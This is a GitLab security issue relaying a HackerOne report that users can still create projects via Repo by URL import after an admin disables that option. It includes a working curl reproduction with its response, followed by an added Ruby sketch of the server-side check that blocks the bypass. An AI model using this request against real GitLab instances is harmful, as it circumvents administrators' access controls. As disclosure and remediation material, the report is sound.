  • #29748
Closed
Open
Issue created Jun 27, 2019 by GitLab SecurityBot@gitlab-securitybotReporter

ESCALATED: Bypass Disabled Repo by URL Project Creation

HackerOne report #630263 by ngalog on 2019-06-26, assigned to estrike:

Summary

As an admin, you can disable Repo by URL project creation in admin page https://:gitlab_instance/admin/application_settings

However, the user can still import a project using Repo by URL regardless of the setting.

Steps to reproduce

  • As an admin, disable the Repo by URL import source in /admin/application_settings/general under Visibility and access controls.

  • As a regular user, run the following curl command:
curl 'http://gitlab.local/-/projects' \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -H "Cookie: $COOKIE" \
    --data-raw "utf8=%E2%9C%93&authenticity_token=$VALID_AUTHENTICITY_TOKEN&project%5Bimport_url%5D=https%3A%2F%2Fgitlab.com%2Fgitlab-org%2Frelease-cli.git&project%5Bimport_url_user%5D=&project%5Bimport_url_password%5D=&project%5Bci_cd_only%5D=false&project%5Bname%5D=Importing+Even+If+Disabled&project%5Bnamespace_id%5D=7&project%5Bpath%5D=importing-even-if-disabled&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0"

This command sends a request equivalent to what happens when using the Repo by URL import method in the UI. It will import the gitlab-org/release-cli project by URL. In my case I got the response

<html><body>You are being <a href="http://gitlab.local/attacker/importing-even-if-disabled">redirected</a>.</body></html>

and the project was imported anyway.

Impact

Bypass of project creation despite the admin setting explicitly disallowing it.

What is the current bug behavior?

Bypass of project creation despite the admin setting explicitly disallowing it.

Reproduced on GitLab CE 11.11.3 (gitlab-ce@e3eeb779d72006b9fbbaecf9f1d8fbd52a7d6383).

Impact

Bypass of project creation via Repo by URL.
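The report shows that the UI toggle alone does not gate the import: the project creation endpoint still honours project[import_url]. The following is an added example (not GitLab's own code) of the server-side check a defender would want, applied to the form body from the curl command above. It assumes the Repo by URL import source is identified by the name "git" in the instance's enabled import sources; that name and the helper functions are assumptions, not taken from the report.

```ruby
require 'uri'

# Assumed name of the "Repo by URL" entry in the admin "Import sources" list.
REPO_BY_URL_SOURCE = 'git'

# Constructed request body, reduced from the curl command in the report.
SAMPLE_BODY = 'utf8=%E2%9C%93&authenticity_token=TOKEN' \
  '&project%5Bimport_url%5D=https%3A%2F%2Fgitlab.com%2Fgitlab-org%2Frelease-cli.git' \
  '&project%5Bimport_url_user%5D=&project%5Bname%5D=Importing+Even+If+Disabled' \
  '&project%5Bpath%5D=importing-even-if-disabled&project%5Bvisibility_level%5D=0'

# Decode an x-www-form-urlencoded body and collect the nested
# project[...] fields into a plain Hash keyed by the inner name.
def project_params(body)
  URI.decode_www_form(body).each_with_object({}) do |(key, value), params|
    m = key.match(/\Aproject\[(\w+)\]\z/)
    params[m[1]] = value if m
  end
end

# The gate the admin setting is meant to provide: an import_url is only
# honoured when the Repo by URL source is enabled for the instance.
# A blank import_url is ordinary project creation and is never gated.
def import_url_allowed?(params, enabled_sources)
  url = params['import_url'].to_s.strip
  return true if url.empty?
  enabled_sources.include?(REPO_BY_URL_SOURCE)
end

# Returns nil when the request may proceed, otherwise the rejection reason
# to log and return to the caller.
def reject_reason(body, enabled_sources)
  return nil if import_url_allowed?(project_params(body), enabled_sources)
  "import_url is not allowed: import source '#{REPO_BY_URL_SOURCE}' is disabled"
end

if __FILE__ == $0
  puts reject_reason(SAMPLE_BODY, %w[github gitlab_project]) # source disabled: rejected
  p reject_reason(SAMPLE_BODY, %w[github git])               # source enabled: nil
end
```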

Edited Aug 04, 2021 by Dominic Couture